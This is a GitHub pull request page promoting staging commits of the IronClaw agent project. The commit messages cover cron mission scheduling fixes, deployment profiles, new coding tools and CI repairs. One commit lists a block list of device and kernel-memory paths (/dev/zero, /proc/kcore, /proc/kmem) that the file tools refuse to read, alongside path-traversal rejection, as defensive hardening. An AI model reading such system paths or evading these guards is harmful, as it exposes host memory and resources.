the bootstrap backfill wouldn't help (it only triggers for Active+Cron with `next_fire_at = None` *after* a process restart). Add the same Cron-cadence guard to both helpers: - `ensure_self_improvement_mission` - `ensure_mission_by_metadata` Regression test `ensure_mission_by_metadata_with_cron_cadence_computes_next_fire_at` exercises the cron path through the private helper and asserts the computed `next_fire_at` is set and in the future. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): final PR #1957 review pass — Ok(None) cron + tick cooldown Addresses the remaining open review threads on PR #1957: 1. types/mission.rs:391 — DST test reference comment now matches the actual `2027-03-13 00:00 UTC` anchor instead of the stale `22:00 UTC` wording (Copilot 3050772614 / 3055762609). 2. runtime/manager.rs::set_thread_metadata — was best-effort and silently swallowed store errors, while the conversation.rs:250 caller comment claimed the resumed thread was guaranteed to see the new value. Now returns Result<(), EngineError>; conversation.rs logs on failure and the comment is honest about the contract (Copilot 3051471863 + serrrfirat 3056444137). 3. types/mission.rs::next_cron_fire_required — new helper that maps Ok(None) to EngineError::InvalidCadence. Used by create_mission, update_mission cadence-change, resume_mission, and the two ensure_*_mission helpers. fire_mission and bootstrap_project keep the existing grace (logged) since the thread/data is already in flight (Copilot 3051471912/47/85 + serrrfirat 3056443657). 4. runtime/mission.rs::tick — when save_mission fails after a successful spawn, the persisted next_fire_at stays in the past and every subsequent 60s tick re-fires the same mission, spawning duplicates up to the daily budget. Added an in-memory `last_fire_attempt` map armed by fire_mission (regardless of save outcome) and consulted by tick to enforce a 90s per-mission cooldown (serrrfirat 3056443083). Regression tests: - create_mission_rejects_unschedulable_cron - update_mission_rejects_switch_to_unschedulable_cron - resume_mission_rejects_unschedulable_cron - tick_cooldown_suppresses_re_fire_on_save_failure All four use a 7-field year-locked cron (`0 0 0 1 1 * 2020`) to exercise the Ok(None) path deterministically. Mission test count: 49 → 53. Verified: cargo fmt clean, cargo clippy --all-targets --all-features zero warnings, full `cargo test` green. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): prune fire cooldown map + reject Quartz-style 6-field cron Addresses two follow-up review threads on PR #1957: 1. `last_fire_attempt` was insert-only — completed/paused missions left stale entries that accumulated over the process lifetime. Now: - `pause_mission` and `complete_mission` drop the entry explicitly. - `tick` opportunistically prunes any entry whose cooldown window has elapsed, catching stragglers from non-graceful transitions (crash recovery, direct store edits) so the map can never grow unbounded. Regression test: `pause_and_complete_drop_cooldown_entry`. (serrrfirat 3057568698) 2. 6-field cron with a year-shaped trailing field (e.g. `0 9 * * * 2027`) was silently misinterpreted as `sec min hr dom mon dow=2027` instead of the Quartz-style "9am daily in 2027" the caller almost certainly meant. `normalize_cron_expression` now rejects this pattern with a clear `InvalidCadence` error pointing at the explicit 7-field form (`0 0 9 * * * 2027`). The 4-digit year heuristic is bounded to 1970-2099 so out-of-range numerics fall through unchanged. The existing pinning test for `* `-terminated 6-field input is unaffected. Regression test: `six_field_cron_with_year_shaped_last_field_is_rejected`. (serrrfirat 3057569413) Verified: cargo fmt clean, cargo clippy --all-targets --all-features zero warnings, full `cargo test` green (308 engine tests pass). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge,engine): parse_cadence prefix ordering + year-stable cron tests Addresses three Copilot review threads on PR #1957: 1. `parse_cadence` (src/bridge/effect_adapter.rs) checked the cron heuristic (`split_whitespace().count() >= 5`) BEFORE the explicit `event:` / `webhook:` prefixes. An input like `event: a b c d e` silently became a `Cron` cadence with a parse-error downstream rather than the `OnEvent` the user requested. Reordered to check explicit prefixes first, falling through to cron only when none match. Regression test `parse_cadence_event_prefix_with_multi_token_pattern` covers `event:` + `webhook:` + a real cron control case. (Copilot 3057828107) 2. `next_cron_fire_respects_timezone` asserted `in_ny.year() >= 2026`, which is time-dependent (fails before 2026, tautology after). Replaced with `assert!(in_ny > Utc::now())` so the test stays stable across calendar years. (Copilot 3057828177) 3. `update_mission_cron_expression_change_recomputes_next_fire_at` used `0 0 1 1 *` ("once a year on Jan 1") as `before` and asserted `after < before`. Race around New Year's: the yearly schedule's next fire could land within seconds and invert the ordering. Switched to a year-locked 7-field cron (`0 0 0 1 1 * 2099`) so the next fire is deterministically far in the future regardless of run date. (Copilot 3057828212) Verified: cargo fmt clean, cargo clippy --all-targets --all-features zero warnings, full `cargo test --lib` green. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): outcome processor reconciles fire accounting on save failure Addresses Copilot review thread on PR #1957: When `fire_mission`'s post-spawn `save_mission` fails, the persisted mission is left missing the new `thread_id` (in `thread_history`), the `threads_today` increment, the `last_fire_at` stamp, and — for cron cadences — the advanced `next_fire_at`. The in-memory `last_fire_attempt` cooldown holds the runaway re-fire path closed for ~90 s, but once it elapses tick would re-fire against the still-stale persisted state. Worse, when the spawned thread later completes, the outcome watcher loaded the **stale** mission, mutated only `approach_history`/`status`, and saved — permanently overwriting any chance to record the missing fields. `process_mission_outcome_and_notify` now reconciles those fields the first time it sees a `thread_id` that isn't in `thread_history`: - Append `thread_id` to `thread_history` - Bump `threads_today` (saturating) - Stamp `last_fire_at = now` as a conservative approximation - For cron missions, recompute `next_fire_at` if it's None-or-past The reconcile is idempotent: a replay with the same `thread_id` is a no-op. Achieves eventual consistency for transient store failures even after retries are exhausted, and handles the permanent-failure case that a save-side retry loop alone could not. Regression test: `outcome_processor_reconciles_missing_fire_accounting` covers both the first-time reconcile path (history append, budget bump, last_fire_at stamp, cron next_fire_at advance) and idempotent replay (no double-count, no duplicate history entry). Verified: cargo fmt clean, cargo clippy --all-targets --all-features zero warnings, full `cargo test --lib` green, ironclaw_engine 87/87 mission tests pass. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): cooldown only on save failure + reconcile to original fire instant Self-review pass on the #1944 work — addresses three findings from a fresh read of the cooldown / reconcile interaction: 1. **Tick cooldown was throttling high-frequency cron schedules.** The in-memory `last_fire_attempt` map was checked unconditionally, with the 90 s cooldown enforced even for normally-firing cron missions. For `* * * * *` (every minute) the 60 s tick interval falls inside the 90 s window, so half the events were silently dropped after every successful fire. The cooldown was only ever needed to detect a `save_mission` failure, not to enforce a global rate floor. Fix: `fire_mission` now uses a single `fire_instant` for both the persisted `Mission.last_fire_at` and the in-memory cooldown entry. Tick arms the cooldown only when the persisted `last_fire_at` does NOT equal the in-memory value — the equality is the proof that `save_mission` succeeded. On the success path the two match and the cooldown is transparent regardless of cron frequency. On the failure path the persisted side still holds the OLD value (or `None`), the mismatch fires, and re-fire is suppressed until reconcile. Regression test: `tick_does_not_throttle_high_frequency_cron_after_successful_fire` creates a `* * * * *` mission, fires it, advances `next_fire_at` into the past WITHOUT clobbering `last_fire_at`, calls tick, and asserts a new thread is spawned. The pre-existing failure-mode test was updated to explicitly clobber `last_fire_at` so it continues to model the failed-save state under the new logic. 2. **Reconcile drifted `last_fire_at` to the outcome time.** When `process_mission_outcome_and_notify` reconciled fields after a failed save, it stamped `last_fire_at = now`, which can be many seconds (or hours, for long-running mission threads) later than the actual fire instant. For users with a configured `cooldown_secs`, that drift gradually extended the cooldown window beyond what the user asked for. Fix: thread the original `fire_instant` from `fire_mission` through `spawn_mission_outcome_watcher` and `process_mission_outcome_and_notify` as `original_fire_at: Option<DateTime<Utc>>`. The reconcile path uses it to set `last_fire_at` back to the moment of the original spawn, falling back to `now` only when the watcher path is unknown (test helpers, callers without an original instant). The watcher's `original_fire_at` ALSO matches the in-memory `last_fire_attempt[mid]` value, so the cooldown's mismatch detector resolves immediately after reconcile — even before the 90 s window elapses. Regression test: `outcome_processor_reconciles_missing_fire_accounting` now passes an explicit `original_fire_at` and asserts the reconciled `last_fire_at` equals that exact instant (not `now`). 3. **Reconcile bypassed `mission.record_thread`.** It pushed directly into `thread_history` and missed the `updated_at` bump. `process_mission_outcome_and_notify` re-stamps `updated_at` later so there was no functional impact, but two paths diverging on the same field-mutation pattern is a future-bug invitation. Fix: use `mission.record_thread(thread_id)` in the reconcile branch for parity with `fire_mission`. Polish: - Documented the lenient `next_cron_fire` choice at all three call sites (`bootstrap_project` backfill, `fire_mission` post-spawn advance, reconcile path) to make the lenient/strict split easy to spot during review. - Added a clarifying comment on `update_mission`'s save-after-validate sequencing — `save_mission` is the only persistence boundary in the function, so `next_cron_fire_required`'s `Err` leaves the store untouched even though the in-memory `mission` was already mutated. Verified: cargo fmt clean, cargo clippy --all-targets --all-features zero warnings, full `cargo test --lib` green, ironclaw_engine 88/88 mission tests pass (87 → 88). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): close cooldown race + corrupt-cron runaway Self-review pass on the cooldown rework — addresses the two failure modes a fresh read of the success/failure detection turned up plus a documentation gap on the equality check. 1. **TOCTOU race between save_mission success and cooldown insert.** The previous order was `save_mission(...)` → `last_fire_attempt.insert(...)`. A concurrent tick observing the gap saw the freshly-persisted `last_fire_at = fire_instant` AND no in-memory entry, evaluated the mismatch check to false, and (if `next_fire_at` was still in the past from any other code path) re-fired immediately. Fix: insert into `last_fire_attempt` BEFORE calling `save_mission`. While save is in flight, the in-memory map has `fire_instant` and the persisted record still has the OLD `last_fire_at`, so a concurrent tick sees a mismatch and arms the cooldown. Once save lands the values match (success) or stay mismatched (failure) — both correct. Regression test: `fire_mission_arms_cooldown_before_save_mission`. Adds an optional save-mission gate to `TestStore` (via oneshot channel + Notify), spawns `fire_mission` in a task, waits for save to enter the gate, and asserts `last_fire_attempt[mid]` is already populated while save is parked. 2. **Corrupted cron expression bypassed the cooldown.** When `next_cron_fire(expression)` returned `Err` (corrupt persisted expression), the previous code stamped `last_fire_at = fire_instant` anyway. Save then succeeded with `last_fire_at` matching the in-memory value, so tick's mismatch detector saw "save succeeded" and the cooldown was never armed. With `next_fire_at` still in the past (preserved because the cron crate couldn't compute a new one), every tick re-fired the same mission until `max_threads_per_day` was exhausted — same root cause shape as #1944. Fix: track `cron_advanced: bool` in `fire_mission`. When the cron advance fails, deliberately leave `last_fire_at` at its OLD value. The in-memory `last_fire_attempt[mid]` is still set to `fire_instant`, so the in-memory vs persisted mismatch arms the cooldown via the exact same code path as a save failure — no new signal needed. After 90 s the cooldown elapses and tick can retry, bounded by `max_threads_per_day`, in case the corruption resolves. Regression test: `tick_does_not_re_fire_corrupted_cron_within_cooldown_window`. Creates a cron mission, corrupts the persisted expression, sets `next_fire_at` to the past, fires once, then asserts a subsequent tick returns no new spawn AND that the persisted `last_fire_at` was deliberately left unset (proving the mismatch-arming path). 3. **Documented the equality check's precision requirement.** The `mission.last_fire_at != Some(*in_mem_last)` comparison is load-bearing and assumes the `Store` round-trips `DateTime<Utc>` without precision loss. The bridge's in-memory cache and JSON persistence both preserve nanoseconds; a future Postgres-backed store using `TIMESTAMPTZ` would silently break the success-path detection (microsecond truncation). Added a long comment at the tick check pointing future store implementers at the requirement so the next backend addition can either preserve precision or relax the comparison to "within one microsecond" before landing. Verified: cargo fmt clean, cargo clippy --all-targets --all-features zero warnings, full `cargo test --lib` green, ironclaw_engine 90/90 mission tests pass (88 → 90). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: add extensible deployment profiles (IRONCLAW_PROFILE) Add a profile system that lets users select a deployment shape with a single env var. Profiles are partial Settings TOML files merged onto defaults before config.toml and DB overlays. Built-in profiles: local, local-sandbox, server, server-multitenant. Users can create custom profiles in ~/.ironclaw/profiles/. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: address review comments — path traversal, case normalization, override order, formatting - Sanitize IRONCLAW_PROFILE to reject path traversal attempts (/, \, ..) - Normalize profile name to lowercase for both user-path and built-in lookups - Fix load_bootstrap_settings to use Settings::default() matching from_env() pattern - Collapse .unwrap_or_default() onto one line to satisfy rustfmt - Improve user_profile_overrides_builtin test to exercise actual merge logic - Add path_traversal_rejected test with 5 malicious name patterns Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…2025) * feat(tools): add production-grade coding tools, file history, and coding skills Add dedicated coding tools inspired by Claude Code's architecture to make IronClaw a more effective coding assistant: New tools: - GlobTool: fast file pattern matching via `glob` crate, sorted by mtime, with default exclusions (.git, node_modules, target, etc.) - GrepTool: content search wrapping ripgrep with 3 output modes (content, files_with_matches, count), pagination, and context lines - FileUndoTool: restore files to pre-modification state using in-memory file history snapshots Enhanced tools: - ReadFileTool: 10MB limit, 2000-line default, binary detection, device path blocking (/dev/zero, /proc/*/fd/*) - ApplyPatchTool: uniqueness validation (error on ambiguous matches), workspace path rejection, 10MB size limit, file history integration - WriteFileTool: file history integration for undo support Updated tool descriptions to guide LLM behavior (prefer apply_patch over write_file, always read before editing, use glob/grep instead of shell). New skills: - coding: best practices for code editing, search, and file operations - commit: git commit message generation workflow - review: code review workflow with structured checklist Shared infrastructure: - DEFAULT_EXCLUDED_DIRS constant in path_utils.rs - FileHistory module with SharedFileHistory for cross-tool snapshots 66 new tests covering all tools, edge cases, and regression scenarios. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * style: apply cargo fmt formatting Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(tools): address PR review — security, correctness, and robustness fixes - Move device path blocking after validate_path() to prevent traversal bypass - Add /proc/kcore, /proc/kmem to blocked paths - Reject absolute patterns and '..' in glob tool, add strip_prefix defense - Wrap glob sync I/O in spawn_blocking to avoid blocking tokio executor - Sort files_with_matches globally before pagination in grep tool - Add default exclusions for node_modules/target in grep tool - Inject ctx.extra_env into rg environment matching ShellTool policy - Use per-line strip_prefix for content mode path relativization - Change FileSnapshot.content_before to Vec<u8> for binary file support - Log snapshot errors with tracing::debug instead of silently discarding - Fix skill name mismatch: code-review → review to match directory Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor(skills): rename review skill directory to code-review Aligns the directory name with the manifest name (code-review) to prevent incorrect override/dedup behavior in the bundled-skill loader. The name stays "code-review" since other domains may also need review-type skills. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(tools): add file edit guards — staleness detection, fuzzy matching, encoding preservation Add file_edit_guard module with production-grade safeguards for file editing: - ReadFileState tracks file reads with mtime for staleness detection - 4-level fuzzy matching fallback (exact → whitespace-normalized → quote-normalized → both) - UTF-16LE BOM detection and line ending style preservation (LF/CRLF/CR) - Read-before-edit enforcement for ApplyPatch and WriteFile tools - No-op edit rejection (old_string == new_string) - Shared state injection via Arc<RwLock<>> across ReadFile, WriteFile, ApplyPatch Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(tools): address all PR review comments — session scoping, parallelism, security - Session-scoped state: ReadFileState and FileHistory now keyed by job_id so concurrent sessions sharing the same registry don't leak state (#2025) - Parallel metadata: grep files_with_matches uses JoinSet (max 64 concurrency) instead of sequential await per file for mtime sorting - Shared env allowlist: grep_tool imports SAFE_ENV_VARS from shell.rs (made pub(crate)) instead of maintaining a divergent copy - Glob traversal: uses Component::ParentDir check instead of substring ".." match, so patterns like "foo..bar" are no longer falsely rejected - UTF-16LE in read_file: binary detection skips null-byte check for files with UTF-16LE BOM; read_file uses encoding-aware read path - Partial flag: default 2000-line truncation now marks read as partial, preventing edits against unseen content - write_file guard softened: staleness check logs warning instead of hard error (full-file replacement has lower risk than apply_patch) - Updated e2e trace to include read_file before apply_patch - Updated expected tool list in schema validation tests Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(tools): use async metadata instead of blocking path.exists() in write_file Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(ci): fix false-positive panic detection for lifetimes in char lexer The check_no_panics.py lexer misinterpreted Rust lifetimes ('static) as char literal starts, causing in_char state to persist across lines and hide all subsequent brace-delimited blocks — including #[cfg(test)] mod tests. Reset in_char at line boundaries since Rust char literals cannot span lines. https://claude.ai/code/session_012bJjER6L5zSAFd9BqYMUmC * test: verify MCP push works * test * chore: remove test file * style: apply cargo fmt to file.rs Collapse multi-line method chain to single line per rustfmt. https://claude.ai/code/session_012bJjER6L5zSAFd9BqYMUmC * style: apply cargo fmt to file.rs Collapse multi-line method chain to single line per rustfmt. https://claude.ai/code/session_012bJjER6L5zSAFd9BqYMUmC * fix(file-tools): harden fuzzy patch matching and undo * fix(ci): formatting + wasmtime 43 cache config compatibility After merging latest staging, cargo fmt had diffs in file tools and the wasmtime cache TOML format changed (v43 dropped the `enabled` field under `[cache]`). Also removes accidental .fmt-test artifact. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor(file-tools): simplify strip_trailing_whitespace Remove redundant double-pass through .lines() — the first collect+join was a no-op since .lines() already handles line endings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(tools): address PR review comments — security, correctness, tests - Add is_sensitive_path checks to GlobTool and GrepTool, matching the defense-in-depth posture of ReadFileTool/WriteFileTool/ListDirTool - Fix UTF-8 panicking byte-index slice in apply_patch error preview (old_string[..200] → chars().take(200)) - Add 10MB size guard on file_history snapshots to prevent memory exhaustion from snapshotting large files - Replace dead turn_number field with auto-incrementing sequence_number in FileHistory — callers no longer pass a hardcoded 0 - Fix glob mtime test flakiness by increasing sleep to 1100ms (above 1s filesystem granularity) - Fix emoji test to actually include emoji/non-ASCII content Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Co-authored-by: Zaki Manian <zaki@iqlusion.io>
* fix(docker): copy profiles/ directory into build stages The deployment profiles feature (152e8b0) added include_str!() references to profiles/*.toml but never updated the Dockerfile, breaking Docker builds. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(docker): remove profiles/ from planner stage cargo chef prepare only scans manifests, not compile-time macros. Having profiles/ in the planner stage needlessly invalidates the dependency cache when a profile TOML changes. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix(ci): resolve 4 staging test failures (#2224, #2178) 1. **wasmtime cache config**: Remove `enabled = true` from generated TOML — wasmtime 43.x dropped this field, causing both `test_enable_compilation_cache_*` tests to panic with "unknown field `enabled`". 2. **bare approval keyword routing**: The `pending_approval.is_none()` guard at thread resolution rejected `ApprovalResponse` submissions (bare "yes"/"no") before reaching the `should_route_as_approval` downgrade added in e0e0fcd. Narrow the early rejection to `ExecApproval` only so bare keywords fall through to `UserInput` processing when no approval is pending. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(test): tighten WASM cache TOML assertion to check key-value format Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(agent): gate approval auth check on pending_approval.is_some() Bare keywords falling through as UserInput should not be blocked by the cross-channel authorization guard. Threads with source_channel=None (e.g. hydrated legacy threads) fail closed in is_approval_authorized, which would reject bare "yes"/"no" even though they are about to be downgraded to regular user input. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(agent): update stale security comment and add guard regression test Address review feedback from @serrrfirat: 1. Update the comment at the approval guard to reflect that only ExecApproval is early-rejected (ApprovalResponse falls through). 2. Add unit test verifying the guard narrowing: ApprovalResponse + no pending approval passes, ExecApproval is rejected, and ExecApproval with pending approval also passes. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * style: cargo fmt Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…1568 chore: promote staging to staging-promote/f37a26f7-24252590260 (2026-04-10 17:16 UTC)
…0260 chore: promote staging to staging-promote/56eb0adf-24250005637 (2026-04-10 16:16 UTC)
…5637 chore: promote staging to staging-promote/a8e6533a-24247643750 (2026-04-10 15:15 UTC)
…3750 chore: promote staging to staging-promote/e5b82fc6-24240316990 (2026-04-10 14:22 UTC)
…6990 chore: promote staging to staging-promote/55cdbf2b-24238274684 (2026-04-10 11:17 UTC)
…4684 chore: promote staging to staging-promote/4147c6d5-24236159086 (2026-04-10 10:20 UTC)
…9086 chore: promote staging to staging-promote/efdb738a-24229913248 (2026-04-10 09:25 UTC)
…3248 chore: promote staging to staging-promote/b9b239ee-24221882216 (2026-04-10 06:33 UTC)
…2216 chore: promote staging to staging-promote/26e5e4cf-24213659418 (2026-04-10 01:33 UTC)
…9418 chore: promote staging to staging-promote/e0bdd74f-24206212580 (2026-04-09 21:14 UTC)
henrypark133
merged commit Apr 10, 2026
c8d824d
into
staging-promote/9399fccc-24203835221
13 checks passed
theredspoon
pushed a commit
to theredspoon/ironclaw
that referenced
this pull request
Jun 21, 2026
…4206212580 chore: promote staging to staging-promote/6cbe2094-24203835221 (2026-04-09 18:19 UTC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Auto-promotion from staging CI
Batch range:
13c458e30cff5c437dfe3d19ddee0522f0c6e4fa..e0bdd74feffedfbed3c0d6ebbcd572996c18351fPromotion branch:
staging-promote/e0bdd74f-24206212580Base:
staging-promote/9399fccc-24203835221Triggered by: Staging CI batch at 2026-04-09 18:19 UTC
Commits in this batch (5):
Current commits in this promotion (0)
Current base:
staging-promote/9399fccc-24203835221Current head:
staging-promote/e0bdd74f-24206212580Current range:
origin/staging-promote/9399fccc-24203835221..origin/staging-promote/e0bdd74f-24206212580Auto-updated by staging promotion metadata workflow
Waiting for gates:
Auto-created by staging-ci workflow